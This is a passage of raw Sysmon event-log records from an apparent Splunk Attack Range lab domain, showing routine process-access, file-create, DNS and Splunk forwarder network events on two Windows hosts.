Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983109AC692339A198D3739EB1A5B329,SHA256=AAA80482131B792249E4A700CF2FF6BEFEC46948FD1AFCE61875752903F0F8F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CE4-6151-7800-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CE4-6151-7800-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054463Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.722{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CE4-6151-7800-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054462Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.558{5EBD8912-8CE4-6151-7800-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054461Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.347{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5B08BA928B9628960AC67B65FEDE1F25,SHA256=FDDB1FF4E7152E587D94C96D66134B7549B16EC04A53A88F60025BD15404D5E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054460Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.347{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0F103FD4E377C1EAB6704D931771D50,SHA256=0168112ACB4B263E8AAFC3FDEC32A47EFCC7B5FD1E0A3DE55C6400F40EF7E6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054459Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.347{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C639334E6EDCD6A2C3BC15FE1CCB274D,SHA256=9F5A563B5A6600E4F7C88E70BBA55A540216584EB36847814122FE7AEDEBD71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054458Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.144{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F8296D84EBAF9D4415BFB2C675C1A227,SHA256=CF3A0C70AD919F6D3FAF4DDEC0B1FF878D1DD97C8F10AA4064939D51BCE96562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.128{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=60BDE4A5390B4753C5DEA97BB372A2E5,SHA256=485AA113C7783C1BC2A1D0AD2247EACCE5720528251BA63BF453628558BFA65B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.112{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=7A9126A21F1152DD8E77C2F6FED7AAE9,SHA256=CABD49667CF43F002418ACB389F81BA795A62BF3C3FBFAD27F7AA8474950644A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.097{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=E26ED9F510A201C5243A6376D6192CDA,SHA256=DA389BA1ECC636F994DF721DC9111FEB30E29F393BB0C605D534955598EA323B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:36.081{5EBD8912-8CE3-6151-7700-00000000FD01}7043112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001054453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.211{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49705-false10.0.1.12-8000- 354300x80000000000000001054452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.917{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64334- 354300x80000000000000001054451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.917{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55044- 354300x80000000000000001054450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:33.916{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64212- 354300x8000000000000000980643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:32.865{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59500-false10.0.1.12-8000- 23542300x8000000000000000980642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:36.196{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=544E7B574EA0F40506A6BACF22407122,SHA256=768AB62AB0AD898C8B073E6CC4388DBD0B17BCA2E38BB78C0F67C5025B82ED4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.929{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64212- 354300x80000000000000001054476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.929{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55044- 354300x80000000000000001054475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:34.929{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64334- 23542300x8000000000000000980658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.962{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88734D762863019DFF3691AED5B4BFFC,SHA256=33F678E627A41E02CDAAB068E708E58E92FA12560EED665B22433658A642BCA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CE5-6151-057A-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 